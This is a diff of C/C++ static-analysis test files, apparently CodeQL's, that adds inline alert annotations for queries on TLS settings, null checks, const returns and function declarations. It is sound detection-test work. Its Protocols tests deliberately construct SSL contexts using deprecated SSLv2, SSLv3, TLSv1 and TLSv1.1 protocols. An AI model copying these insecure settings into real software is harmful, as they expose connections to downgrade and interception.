a/cpp/ql/test/query-tests/Likely Bugs/Protocols/TlsSettingsMisconfiguration.qlref b/cpp/ql/test/query-tests/Likely Bugs/Protocols/TlsSettingsMisconfiguration.qlref index 8c1c54ff9606..bc1be3c9bfb6 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Protocols/TlsSettingsMisconfiguration.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Protocols/TlsSettingsMisconfiguration.qlref @@ -1 +1,2 @@ -Likely Bugs/Protocols/TlsSettingsMisconfiguration.ql \ No newline at end of file +query: Likely Bugs/Protocols/TlsSettingsMisconfiguration.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Protocols/UseOfDeprecatedHardcodedProtocol.qlref b/cpp/ql/test/query-tests/Likely Bugs/Protocols/UseOfDeprecatedHardcodedProtocol.qlref index 2cef090faef4..b682f4aa2d55 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Protocols/UseOfDeprecatedHardcodedProtocol.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Protocols/UseOfDeprecatedHardcodedProtocol.qlref @@ -1 +1,2 @@ -Likely Bugs/Protocols/UseOfDeprecatedHardcodedProtocol.ql \ No newline at end of file +query: Likely Bugs/Protocols/UseOfDeprecatedHardcodedProtocol.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Protocols/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Protocols/test.cpp index 5c2c2d6e3574..f9b0f05b091f 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Protocols/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Protocols/test.cpp @@ -22,23 +22,23 @@ void TestProperConfiguration_inter_CorrectUsage02() void TestProperConfiguration_inter_IncorrectUsage01() { - boost::asio::ssl::context ctx(boost::asio::ssl::context::sslv23); // BAD - missing disable SSLv3 + boost::asio::ssl::context ctx(boost::asio::ssl::context::sslv23); // BAD - missing disable SSLv3 // $ Alert[cpp/boost/tls-settings-misconfiguration] SetOptionsNoOldTls(ctx); } void TestProperConfiguration_IncorrectUsage01() { - boost::asio::ssl::context ctx(boost::asio::ssl::context::sslv23); // BAD + boost::asio::ssl::context ctx(boost::asio::ssl::context::sslv23); // BAD // $ Alert[cpp/boost/tls-settings-misconfiguration] } void TestProperConfiguration_IncorrectUsage02() { - boost::asio::ssl::context ctx(boost::asio::ssl::context::tls); // BAD + boost::asio::ssl::context ctx(boost::asio::ssl::context::tls); // BAD // $ Alert[cpp/boost/tls-settings-misconfiguration] } void TestProperConfiguration_IncorrectUsage03() { - boost::asio::ssl::context ctx(boost::asio::ssl::context::tls); // BAD + boost::asio::ssl::context ctx(boost::asio::ssl::context::tls); // BAD // $ Alert[cpp/boost/tls-settings-misconfiguration] SetOptionsNoOldTls(ctx); ctx.set_options(boost::asio::ssl::context::no_tlsv1 | boost::asio::ssl::context::no_tlsv1_2 ); // BUG - disabling TLS 1.2 @@ -47,21 +47,21 @@ void TestProperConfiguration_IncorrectUsage03() void TestHardcodedProtocols() { //////////////////////// Banned Hardcoded algorithms - boost::asio::ssl::context cxt_sslv2(boost::asio::ssl::context::sslv2); // BUG - boost::asio::ssl::context cxt_sslv2c(boost::asio::ssl::context::sslv2_client); // BUG - boost::asio::ssl::context cxt_sslv2s(boost::asio::ssl::context::sslv2_server); // BUG + boost::asio::ssl::context cxt_sslv2(boost::asio::ssl::context::sslv2); // BUG // $ Alert[cpp/boost/use-of-deprecated-hardcoded-security-protocol] + boost::asio::ssl::context cxt_sslv2c(boost::asio::ssl::context::sslv2_client); // BUG // $ Alert[cpp/boost/use-of-deprecated-hardcoded-security-protocol] + boost::asio::ssl::context cxt_sslv2s(boost::asio::ssl::context::sslv2_server); // BUG // $ Alert[cpp/boost/use-of-deprecated-hardcoded-security-protocol] - boost::asio::ssl::context cxt_sslv3(boost::asio::ssl::context::sslv3); // BUG - boost::asio::ssl::context cxt_sslv3c(boost::asio::ssl::context::sslv3_client); // BUG - boost::asio::ssl::context cxt_sslv3s(boost::asio::ssl::context::sslv3_server); // BUG + boost::asio::ssl::context cxt_sslv3(boost::asio::ssl::context::sslv3); // BUG // $ Alert[cpp/boost/use-of-deprecated-hardcoded-security-protocol] + boost::asio::ssl::context cxt_sslv3c(boost::asio::ssl::context::sslv3_client); // BUG // $ Alert[cpp/boost/use-of-deprecated-hardcoded-security-protocol] + boost::asio::ssl::context cxt_sslv3s(boost::asio::ssl::context::sslv3_server); // BUG // $ Alert[cpp/boost/use-of-deprecated-hardcoded-security-protocol] - boost::asio::ssl::context cxt_tlsv1(boost::asio::ssl::context::tlsv1); // BUG - boost::asio::ssl::context cxt_tlsv1c(boost::asio::ssl::context::tlsv1_client); // BUG - boost::asio::ssl::context cxt_tlsv1s(boost::asio::ssl::context::tlsv1_server); // BUG + boost::asio::ssl::context cxt_tlsv1(boost::asio::ssl::context::tlsv1); // BUG // $ Alert[cpp/boost/use-of-deprecated-hardcoded-security-protocol] + boost::asio::ssl::context cxt_tlsv1c(boost::asio::ssl::context::tlsv1_client); // BUG // $ Alert[cpp/boost/use-of-deprecated-hardcoded-security-protocol] + boost::asio::ssl::context cxt_tlsv1s(boost::asio::ssl::context::tlsv1_server); // BUG // $ Alert[cpp/boost/use-of-deprecated-hardcoded-security-protocol] - boost::asio::ssl::context cxt_tlsv11(boost::asio::ssl::context::tlsv11); // BUG - boost::asio::ssl::context cxt_tlsv11c(boost::asio::ssl::context::tlsv11_client); // BUG - boost::asio::ssl::context cxt_tlsv11s(boost::asio::ssl::context::tlsv11_server); // BUG + boost::asio::ssl::context cxt_tlsv11(boost::asio::ssl::context::tlsv11); // BUG // $ Alert[cpp/boost/use-of-deprecated-hardcoded-security-protocol] + boost::asio::ssl::context cxt_tlsv11c(boost::asio::ssl::context::tlsv11_client); // BUG // $ Alert[cpp/boost/use-of-deprecated-hardcoded-security-protocol] + boost::asio::ssl::context cxt_tlsv11s(boost::asio::ssl::context::tlsv11_server); // BUG // $ Alert[cpp/boost/use-of-deprecated-hardcoded-security-protocol] ////////////////////// Hardcoded algorithms @@ -76,7 +76,7 @@ void TestHardcodedProtocols() void InterProceduralTest(boost::asio::ssl::context::method m) { - boost::asio::ssl::context cxt1(m); // BUG - Multiple hits (sink) + boost::asio::ssl::context cxt1(m); // BUG - Multiple hits (sink) // $ Alert[cpp/boost/use-of-deprecated-hardcoded-security-protocol] } void TestHardcodedProtocols_inter() diff --git a/cpp/ql/test/query-tests/Likely Bugs/Protocols/test2.cpp b/cpp/ql/test/query-tests/Likely Bugs/Protocols/test2.cpp index 5679cee8b0f8..c7715ff24614 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Protocols/test2.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Protocols/test2.cpp @@ -12,7 +12,7 @@ void bad1() { // BAD: missing disable SSLv3 boost::asio::ssl::context::method m = boost::asio::ssl::context::sslv23; - boost::asio::ssl::context ctx(m); + boost::asio::ssl::context ctx(m); // $ Alert[cpp/boost/tls-settings-misconfiguration] ctx.set_options(boost::asio::ssl::context::no_tlsv1 | boost::asio::ssl::context::no_tlsv1_1); } @@ -20,7 +20,7 @@ void good2() { // GOOD [FALSE POSITIVE x 3] boost::asio::ssl::context::options opts = boost::asio::ssl::context::no_tlsv1 | boost::asio::ssl::context::no_tlsv1_1 | boost::asio::ssl::context::no_sslv3; - boost::asio::ssl::context ctx(boost::asio::ssl::context::sslv23); + boost::asio::ssl::context ctx(boost::asio::ssl::context::sslv23); // $ Alert[cpp/boost/tls-settings-misconfiguration] ctx.set_options(opts); } @@ -28,7 +28,7 @@ void bad2() { // BAD: missing disable SSLv3 [WITH FALSE POSITIVE x 2] boost::asio::ssl::context::options opts = boost::asio::ssl::context::no_tlsv1 | boost::asio::ssl::context::no_tlsv1_1; - boost::asio::ssl::context ctx(boost::asio::ssl::context::sslv23); + boost::asio::ssl::context ctx(boost::asio::ssl::context::sslv23); // $ Alert[cpp/boost/tls-settings-misconfiguration] ctx.set_options(opts); } @@ -42,14 +42,14 @@ void good3() void bad3() { // BAD: missing disable SSLv3 - boost::asio::ssl::context *ctx = new boost::asio::ssl::context(boost::asio::ssl::context::sslv23); + boost::asio::ssl::context *ctx = new boost::asio::ssl::context(boost::asio::ssl::context::sslv23); // $ Alert[cpp/boost/tls-settings-misconfiguration] ctx->set_options(boost::asio::ssl::context::no_tlsv1 | boost::asio::ssl::context::no_tlsv1_1); } void bad4() { // BAD: missing disable SSLv3 - boost::asio::ssl::context ctx(boost::asio::ssl::context::sslv23); + boost::asio::ssl::context ctx(boost::asio::ssl::context::sslv23); // $ Alert[cpp/boost/tls-settings-misconfiguration] } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Protocols/test3.cpp b/cpp/ql/test/query-tests/Likely Bugs/Protocols/test3.cpp index c9932b31618d..88f204dcced9 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Protocols/test3.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Protocols/test3.cpp @@ -4,7 +4,7 @@ void useTLS_bad() { - boost::asio::ssl::context ctx(boost::asio::ssl::context::tls); + boost::asio::ssl::context ctx(boost::asio::ssl::context::tls); // $ Alert[cpp/boost/tls-settings-misconfiguration] ctx.set_options(boost::asio::ssl::context::no_tlsv1); // BAD: missing no_tlsv1_1 // ... diff --git a/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.cpp b/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.cpp index 2760dcb349c2..5c0ee7378dc7 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.cpp @@ -1,23 +1,23 @@ void test_simple_bad(int *p) { int x; - x = *p; - if (p == nullptr) { // BAD + x = *p; // $ Source + if (p == nullptr) { // BAD // $ Alert return; } } void test_not_same_basic_block(int *p) { - int x = *p; + int x = *p; // $ Source if (x > 100) return; - if (!p) // BAD + if (!p) // BAD // $ Alert return; } void test_indirect(int **p) { int x; - x = **p; - if (*p == nullptr) { // BAD + x = **p; // $ Source + if (*p == nullptr) { // BAD // $ Alert return; } } @@ -45,10 +45,10 @@ void test_no_single_dominator(int *p, bool b) { } int test_postdominator_same_bb(int *p) { - int b = (p == nullptr); // BAD + int b = (p == nullptr); // BAD // $ Alert // This dereference is a postdominator of the null check, meaning that all // paths from the check to the function exit will pass through it. - return *p + b; + return *p + b; // $ Source } int test_postdominator(int *p) { @@ -75,8 +75,8 @@ void test_indirect_local() { int *p = &a; int **pp = &p; int x; - x = **pp; - if (*pp == nullptr) { // BAD + x = **pp; // $ Source + if (*pp == nullptr) { // BAD // $ Alert return; } } @@ -89,8 +89,8 @@ void test_field_local(bool boolvar) { auto sp = &s; if (boolvar) { - int x = *sp->p; - if (sp->p == nullptr) { // BAD + int x = *sp->p; // $ Source + if (sp->p == nullptr) { // BAD // $ Alert return; } } else { diff --git a/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.expected b/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.expected index 8ffb2330840e..997de4af41fd 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.expected @@ -1,3 +1,21 @@ +#select +| RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | RedundantNullCheckSimple.cpp:3:7:3:8 | Load: * ... | RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:3:7:3:8 | Load: * ... | the value is dereferenced | +| RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | RedundantNullCheckSimple.cpp:10:11:10:12 | Load: * ... | RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:10:11:10:12 | Load: * ... | the value is dereferenced | +| RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | RedundantNullCheckSimple.cpp:19:7:19:9 | Load: * ... | RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:19:7:19:9 | Load: * ... | the value is dereferenced | +| RedundantNullCheckSimple.cpp:48:12:48:12 | Load: p | RedundantNullCheckSimple.cpp:51:10:51:11 | Load: * ... | RedundantNullCheckSimple.cpp:48:12:48:12 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:51:10:51:11 | Load: * ... | the value is dereferenced | +| RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | RedundantNullCheckSimple.cpp:78:7:78:10 | Load: * ... | RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:78:7:78:10 | Load: * ... | the value is dereferenced | +| RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | RedundantNullCheckSimple.cpp:92:13:92:18 | Load: * ... | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:92:13:92:18 | Load: * ... | the value is dereferenced | +edges +| RedundantNullCheckSimple.cpp:3:7:3:8 | Load: * ... | RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | +| RedundantNullCheckSimple.cpp:3:8:3:8 | Load: p | RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | +| RedundantNullCheckSimple.cpp:10:11:10:12 | Load: * ... | RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | +| RedundantNullCheckSimple.cpp:10:12:10:12 | Load: p | RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | +| RedundantNullCheckSimple.cpp:19:7:19:9 | Load: * ... | RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | +| RedundantNullCheckSimple.cpp:19:8:19:9 | Load: * ... | RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | +| RedundantNullCheckSimple.cpp:78:7:78:10 | Load: * ... | RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | +| RedundantNullCheckSimple.cpp:78:8:78:10 | Load: * ... | RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | +| RedundantNullCheckSimple.cpp:92:13:92:18 | Load: * ... | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | +| RedundantNullCheckSimple.cpp:92:18:92:18 | Load: p | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | nodes | RedundantNullCheckSimple.cpp:3:3:3:3 | VariableAddress: x | semmle.label | x | | RedundantNullCheckSimple.cpp:3:3:3:8 | Store: ... = ... | semmle.label | ... = ... | @@ -36,21 +54,3 @@ nodes | RedundantNullCheckSimple.cpp:93:9:93:10 | VariableAddress: sp | semmle.label | sp | | RedundantNullCheckSimple.cpp:93:13:93:13 | FieldAddress: p | semmle.label | p | | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | semmle.label | p | -edges -| RedundantNullCheckSimple.cpp:3:7:3:8 | Load: * ... | RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | -| RedundantNullCheckSimple.cpp:3:8:3:8 | Load: p | RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | -| RedundantNullCheckSimple.cpp:10:11:10:12 | Load: * ... | RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | -| RedundantNullCheckSimple.cpp:10:12:10:12 | Load: p | RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | -| RedundantNullCheckSimple.cpp:19:7:19:9 | Load: * ... | RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | -| RedundantNullCheckSimple.cpp:19:8:19:9 | Load: * ... | RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | -| RedundantNullCheckSimple.cpp:78:7:78:10 | Load: * ... | RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | -| RedundantNullCheckSimple.cpp:78:8:78:10 | Load: * ... | RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | -| RedundantNullCheckSimple.cpp:92:13:92:18 | Load: * ... | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | -| RedundantNullCheckSimple.cpp:92:18:92:18 | Load: p | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | -#select -| RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | RedundantNullCheckSimple.cpp:3:7:3:8 | Load: * ... | RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:3:7:3:8 | Load: * ... | the value is dereferenced | -| RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | RedundantNullCheckSimple.cpp:10:11:10:12 | Load: * ... | RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:10:11:10:12 | Load: * ... | the value is dereferenced | -| RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | RedundantNullCheckSimple.cpp:19:7:19:9 | Load: * ... | RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:19:7:19:9 | Load: * ... | the value is dereferenced | -| RedundantNullCheckSimple.cpp:48:12:48:12 | Load: p | RedundantNullCheckSimple.cpp:51:10:51:11 | Load: * ... | RedundantNullCheckSimple.cpp:48:12:48:12 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:51:10:51:11 | Load: * ... | the value is dereferenced | -| RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | RedundantNullCheckSimple.cpp:78:7:78:10 | Load: * ... | RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:78:7:78:10 | Load: * ... | the value is dereferenced | -| RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | RedundantNullCheckSimple.cpp:92:13:92:18 | Load: * ... | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:92:13:92:18 | Load: * ... | the value is dereferenced | diff --git a/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.qlref b/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.qlref index 2223e47c30d2..169150bbd516 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.qlref @@ -1 +1,2 @@ -Likely Bugs/RedundantNullCheckSimple.ql +query: Likely Bugs/RedundantNullCheckSimple.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/ReturnConstType/ReturnConstType.qlref b/cpp/ql/test/query-tests/Likely Bugs/ReturnConstType/ReturnConstType.qlref index ee515afb200f..bf5203dd1230 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/ReturnConstType/ReturnConstType.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/ReturnConstType/ReturnConstType.qlref @@ -1 +1,2 @@ -Likely Bugs/ReturnConstType.ql +query: Likely Bugs/ReturnConstType.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/ReturnConstType/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/ReturnConstType/test.cpp index 77c82fbb54cb..a1d04f71a747 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/ReturnConstType/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/ReturnConstType/test.cpp @@ -2,12 +2,12 @@ // --- examples from the qhelp --- // The leftmost const has no effect here. -const int square(const int x) { // BAD +const int square(const int x) { // BAD // $ Alert return x * x; } // The const has no effect here, and can easily be mistaken for const char*. -char* const id(char* s) { // BAD +char* const id(char* s) { // BAD // $ Alert return s; } @@ -15,9 +15,9 @@ char* const id(char* s) { // BAD const char *getAConstantString(); const char **getAConstantStringPointer(); -const char getAConstChar(); // BAD -const signed char getASignedConstChar(); // BAD -unsigned const char getAnUnsignedConstChar(); // BAD +const char getAConstChar(); // BAD // $ Alert +const signed char getASignedConstChar(); // BAD // $ Alert +unsigned const char getAnUnsignedConstChar(); // BAD // $ Alert char getAChar(); typedef const char mychar; @@ -43,10 +43,10 @@ template class myWrapper { myWrapper testTemplateClass{t: 'a'}; #define MYCHAR const char -MYCHAR getAMYCHAR(); // FALSE POSITIVE +MYCHAR getAMYCHAR(); // FALSE POSITIVE // $ Alert #define ID(T) T id_ (T x) {return x;} -ID(const char); // FALSE POSITIVE +ID(const char); // FALSE POSITIVE // $ Alert const float pi = 3.14159626f; const float &getPiRef() { return pi; } // GOOD diff --git a/cpp/ql/test/query-tests/Likely Bugs/ReturnConstTypeMember/ReturnConstTypeMember.qlref b/cpp/ql/test/query-tests/Likely Bugs/ReturnConstTypeMember/ReturnConstTypeMember.qlref index 052b0cd2ad50..3dbe1d19bf1e 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/ReturnConstTypeMember/ReturnConstTypeMember.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/ReturnConstTypeMember/ReturnConstTypeMember.qlref @@ -1 +1,2 @@ -Likely Bugs/ReturnConstTypeMember.ql +query: Likely Bugs/ReturnConstTypeMember.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/ReturnConstTypeMember/templates.cpp b/cpp/ql/test/query-tests/Likely Bugs/ReturnConstTypeMember/templates.cpp index 73d18c844d23..c36e5e9625eb 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/ReturnConstTypeMember/templates.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/ReturnConstTypeMember/templates.cpp @@ -10,7 +10,7 @@ class TC1 { template class TC2 { public: - T fun() const { + T fun() const { // $ Alert return 5; } }; diff --git a/cpp/ql/test/query-tests/Likely Bugs/ReturnConstTypeMember/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/ReturnConstTypeMember/test.cpp index e568d0da1525..e8eb23d013e1 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/ReturnConstTypeMember/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/ReturnConstTypeMember/test.cpp @@ -2,13 +2,13 @@ class myClass { int getAnInt() { return 0; } - const int getAConstInt() { + const int getAConstInt() { // $ Alert return 0; } int getAnIntConst() const { return 0; } - const int getAConstIntConst() const { + const int getAConstIntConst() const { // $ Alert return 0; } @@ -16,7 +16,7 @@ class myClass { return 0; } - static const int getAStaticConstInt() { + static const int getAStaticConstInt() { // $ Alert return 0; } }; diff --git a/cpp/ql/test/query-tests/Likely Bugs/ShortLoopVarName/ShortLoopVarName.cpp b/cpp/ql/test/query-tests/Likely Bugs/ShortLoopVarName/ShortLoopVarName.cpp index 7dd7855bacc5..65e41093c190 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/ShortLoopVarName/ShortLoopVarName.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/ShortLoopVarName/ShortLoopVarName.cpp @@ -3,7 +3,7 @@ void test1() { - int i, j, outer_loop_var, inner_loop_var; + int i, j, outer_loop_var, inner_loop_var; // $ Alert for (i = 0; i < 10; i++) // GOOD: no nested loop { @@ -27,7 +27,7 @@ void test1() void test2(char *str) { - for (char *a = str; *a != NULL; a++) // BAD: short name + for (char *a = str; *a != NULL; a++) // BAD: short name // $ Alert { char *b = a; // GOOD: not a loop variable @@ -70,7 +70,7 @@ void test3() } } - for (int y = 0; y < 256; y++) // BAD: x and y are not a co-ordinate pair + for (int y = 0; y < 256; y++) // BAD: x and y are not a co-ordinate pair // $ Alert { for (int x = 0; x < 256; x++) { @@ -93,7 +93,7 @@ void test3() { string strings[10]; - for (int i = 0; i < 10; i++) // BAD: x and y are not a co-ordinate pair + for (int i = 0; i < 10; i++) // BAD: x and y are not a co-ordinate pair // $ Alert { for (int j = 0; j < strings[i].strlen; j++) { diff --git a/cpp/ql/test/query-tests/Likely Bugs/ShortLoopVarName/ShortLoopVarName.qlref b/cpp/ql/test/query-tests/Likely Bugs/ShortLoopVarName/ShortLoopVarName.qlref index 6e4b506018f8..de5c76f3f6a8 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/ShortLoopVarName/ShortLoopVarName.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/ShortLoopVarName/ShortLoopVarName.qlref @@ -1 +1,2 @@ -Likely Bugs/ShortLoopVarName.ql +query: Likely Bugs/ShortLoopVarName.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/ImplicitFunctionDeclaration.qlref b/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/ImplicitFunctionDeclaration.qlref index 38492f2a203c..d96192c760c3 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/ImplicitFunctionDeclaration.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/ImplicitFunctionDeclaration.qlref @@ -1 +1,2 @@ -Likely Bugs/Underspecified Functions/ImplicitFunctionDeclaration.ql \ No newline at end of file +query: Likely Bugs/Underspecified Functions/ImplicitFunctionDeclaration.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/MistypedFunctionArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/MistypedFunctionArguments.qlref index e61361d6bfee..56065d60fcee 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/MistypedFunctionArguments.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/MistypedFunctionArguments.qlref @@ -1 +1,2 @@ -Likely Bugs/Underspecified Functions/MistypedFunctionArguments.ql +query: Likely Bugs/Underspecified Functions/MistypedFunctionArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/TooFewArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/TooFewArguments.qlref index 710092c54d85..c0c3166e8d55 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/TooFewArguments.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/TooFewArguments.qlref @@ -1 +1,2 @@ -Likely Bugs/Underspecified Functions/TooFewArguments.ql +query: Likely Bugs/Underspecified Functions/TooFewArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/TooManyArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/TooManyArguments.qlref index ca44af39c2bf..c78a44facd11 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/TooManyArguments.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/TooManyArguments.qlref @@ -1 +1,2 @@ -Likely Bugs/Underspecified Functions/TooManyArguments.ql +query: Likely Bugs/Underspecified Functions/TooManyArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/test.c b/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/test.c index d77c16683ed6..a33a09acda62 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/test.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Underspecified Functions/test.c @@ -25,52 +25,52 @@ void test(int *argv[]) { declared_void(); // GOOD declared_with(1); // GOOD - undeclared(); // BAD (GOOD for everything except cpp/implicit-function-declaration) + undeclared(); // BAD (GOOD for everything except cpp/implicit-function-declaration) // $ Alert[cpp/implicit-function-declaration] undeclared(1); // GOOD - not_yet_declared1(1); // BAD (GOOD for everything except for cpp/implicit-function-declaration) - not_yet_declared2(1); // BAD (GOOD for everything except for cpp/implicit-function-declaration) - not_yet_declared2(ca); // BAD (GOOD for everything except for cpp/mistyped-function-arguments + not_yet_declared1(1); // BAD (GOOD for everything except for cpp/implicit-function-declaration) // $ Alert[cpp/implicit-function-declaration] + not_yet_declared2(1); // BAD (GOOD for everything except for cpp/implicit-function-declaration) // $ Alert[cpp/implicit-function-declaration] + not_yet_declared2(ca); // BAD (GOOD for everything except for cpp/mistyped-function-arguments // $ Alert[cpp/mistyped-function-arguments] // and cpp/too-few-arguments. Not detected in the case of cpp/too-few-arguments.) not_yet_declared2(); // BAD [NOT DETECTED] (GOOD for everything except for cpp/too-few-arguments) - declared_empty_defined_with(); // BAD + declared_empty_defined_with(); // BAD // $ Alert[cpp/too-few-arguments] declared_empty_defined_with(1); // GOOD int x; - declared_empty_defined_with(&x); // BAD - declared_empty_defined_with(3, &x); // BAD + declared_empty_defined_with(&x); // BAD // $ Alert[cpp/mistyped-function-arguments] + declared_empty_defined_with(3, &x); // BAD // $ Alert[cpp/futile-params] - not_declared_defined_with(-1, 0, 2U); // BAD (GOOD for everything except for cpp/implicit-function-declaration) - not_declared_defined_with(4LL, 0, 2.5e9f); // BAD + not_declared_defined_with(-1, 0, 2U); // BAD (GOOD for everything except for cpp/implicit-function-declaration) // $ Alert[cpp/implicit-function-declaration] + 